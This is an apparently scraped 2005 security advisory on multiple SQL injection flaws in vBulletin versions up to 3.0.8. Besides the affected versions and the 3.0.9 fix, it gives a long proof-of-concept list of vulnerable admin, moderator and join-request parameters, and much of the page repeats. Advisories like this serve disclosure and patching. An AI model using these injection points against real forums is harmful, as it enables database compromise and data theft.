VBulletin Multiple Moderator And Administrator SQL Injection Vulnerabilities
BID:14872
Info
VBulletin Multiple Moderator And Administrator SQL Injection Vulnerabilities
| Bugtraq ID: | 14872 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 19 2005 12:00AM |
| Updated: | Sep 19 2005 12:00AM |
| Credit: | deluxe <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
VBulletin VBulletin 3.0.8 VBulletin VBulletin 3.0.7 VBulletin VBulletin 3.0.6 VBulletin VBulletin 3.0.5 VBulletin VBulletin 3.0.4 VBulletin VBulletin 3.0.3 VBulletin VBulletin 3.0.2 VBulletin VBulletin 3.0.1 VBulletin VBulletin 3.0 Gamma VBulletin VBulletin 3.0 beta 7 VBulletin VBulletin 3.0 beta 6 VBulletin VBulletin 3.0 beta 5 VBulletin VBulletin 3.0 beta 4 VBulletin VBulletin 3.0 beta 3 VBulletin VBulletin 3.0 beta 2 VBulletin VBulletin 3.0 VBulletin VBulletin 2.3.4 VBulletin VBulletin 2.3.3 VBulletin VBulletin 2.3.2 VBulletin VBulletin 2.3 .0 VBulletin VBulletin 2.2.9 VBulletin VBulletin 2.2.8 VBulletin VBulletin 2.2.7 VBulletin VBulletin 2.2.6 VBulletin VBulletin 2.2.5 VBulletin VBulletin 2.2.4 VBulletin VBulletin 2.2.3 VBulletin VBulletin 2.2.2 VBulletin VBulletin 2.2.1 VBulletin VBulletin 2.2 .0 VBulletin VBulletin 2.0.3 VBulletin VBulletin 2.0 rc 3 VBulletin VBulletin 2.0 rc 2 VBulletin VBulletin 1.0.1 lite |
| Not Vulnerable: |
VBulletin VBulletin 3.0.9 |
Discussion
VBulletin Multiple Moderator And Administrator SQL Injection Vulnerabilities
vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
VBulletin Multiple Moderator And Administrator SQL Injection Vulnerabilities
No exploit is required.
The following GET and POST proof of concepts are available:
The following issue is exploitable by any attacker:
> /joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>
These issues affect the following administrator scripts:
> /admincp/admincalendar.php:
GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
GET: <do=addmod&calendarid=[SQL-Injection]>
GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
GET: <do=edit&calendarid=[SQL-Injection]>
POST: <do=kill&calendarid=[SQL-Injection]>
POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
GET: <do=remove&calendarid=[SQL-Injection]>
POST: <do=removemod&moderatorid=[SQL-Injection]>
POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
GET: <do=updateholiday&holidayid=0XF>
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>
> /admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>
> /admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>
> /admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>
> /admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>
> /admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
GET: <do=pmuserstats&ids=0XF>
> /admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>
> /admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>
> /admincp/template.php:
GET: <do=editstyle&dostyleid=[SQL-Injection]>
GET: <do=editstyle&dostyleid=[SQL-Injection]>
POST: <do=revertall&dostyleid=[SQL-Injection]>
> /admincp/thread.php::
POST: <do=dothreads&thread[forumid]=0XF>
> /admincp/usertools.php:
POST: <do=updateprofilepic>
> /admincp/vbugs_admin.php:
GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>
These issues affect the following moderator scripts:
> /modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>
> /modcp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>
> /modcp/user.php:
GET: <do=avatar&userid=0XF>
No exploit is required.
The following GET and POST proof of concepts are available:
The following issue is exploitable by any attacker:
> /joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>
These issues affect the following administrator scripts:
> /admincp/admincalendar.php:
GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
GET: <do=addmod&calendarid=[SQL-Injection]>
GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
GET: <do=edit&calendarid=[SQL-Injection]>
POST: <do=kill&calendarid=[SQL-Injection]>
POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
GET: <do=remove&calendarid=[SQL-Injection]>
POST: <do=removemod&moderatorid=[SQL-Injection]>
POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
GET: <do=updateholiday&holidayid=0XF>
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>
> /admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>
> /admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>
> /admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>
> /admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>
> /admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
GET: <do=pmuserstats&ids=0XF>
> /admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>
> /admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>
> /admincp/template.php:
GET: <do=editstyle&dostyleid=[SQL-Injection]>
GET: <do=editstyle&dostyleid=[SQL-Injection]>
POST: <do=revertall&dostyleid=[SQL-Injection]>
> /admincp/thread.php::
POST: <do=dothreads&thread[forumid]=0XF>
> /admincp/usertools.php:
POST: <do=updateprofilepic>
> /admincp/vbugs_admin.php:
GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>
These issues affect the following moderator scripts:
> /modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>
> /modcp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>
> /modcp/user.php:
GET: <do=avatar&userid=0XF>
Solution / Fix
VBulletin Multiple Moderator And Administrator SQL Injection Vulnerabilities
Solution:
Reports indicate the vendor has addressed these issues in version 3.0.9, this has not been confirmed by Symantec or the vendor. Users are urged to contact the vendor for further information.
VBulletin VBulletin 1.0.1 lite
VBulletin VBulletin 2.0 rc 2
VBulletin VBulletin 2.0 rc 3
VBulletin VBulletin 2.0.3
VBulletin VBulletin 2.2 .0
VBulletin VBulletin 2.2.1
VBulletin VBulletin 2.2.2
VBulletin VBulletin 2.2.3
VBulletin VBulletin 2.2.4
VBulletin VBulletin 2.2.5
VBulletin VBulletin 2.2.6
VBulletin VBulletin 2.2.7
VBulletin VBulletin 2.2.8
VBulletin VBulletin 2.2.9
VBulletin VBulletin 2.3 .0
VBulletin VBulletin 2.3.2
VBulletin VBulletin 2.3.3
VBulletin VBulletin 2.3.4
VBulletin VBulletin 3.0 beta 4
VBulletin VBulletin 3.0 beta 2
VBulletin VBulletin 3.0 beta 6
VBulletin VBulletin 3.0 beta 7
VBulletin VBulletin 3.0 Gamma
VBulletin VBulletin 3.0 beta 3
VBulletin VBulletin 3.0 beta 5
VBulletin VBulletin 3.0
VBulletin VBulletin 3.0.1
VBulletin VBulletin 3.0.2
VBulletin VBulletin 3.0.3
VBulletin VBulletin 3.0.4
VBulletin VBulletin 3.0.5
VBulletin VBulletin 3.0.6
VBulletin VBulletin 3.0.7
VBulletin VBulletin 3.0.8
Solution:
Reports indicate the vendor has addressed these issues in version 3.0.9, this has not been confirmed by Symantec or the vendor. Users are urged to contact the vendor for further information.
VBulletin VBulletin 1.0.1 lite
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.0 rc 2
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.0 rc 3
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.0.3
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2 .0
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2.1
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2.2
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2.3
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2.4
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2.5
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2.6
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2.7
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2.8
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.2.9
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.3 .0
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.3.2
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.3.3
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 2.3.4
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0 beta 4
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0 beta 2
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0 beta 6
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0 beta 7
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0 Gamma
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0 beta 3
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0 beta 5
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0.1
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0.2
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0.3
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0.4
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0.5
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0.6
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0.7
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
VBulletin VBulletin 3.0.8
-
VBulletin vBulletin 3.0.9
http://members.vbulletin.com/
References
VBulletin Multiple Moderator And Administrator SQL Injection Vulnerabilities
References:
References:
- vBulletin 3.0.9 Released (vBulletin)
- Vendor Homepage (Kyberna)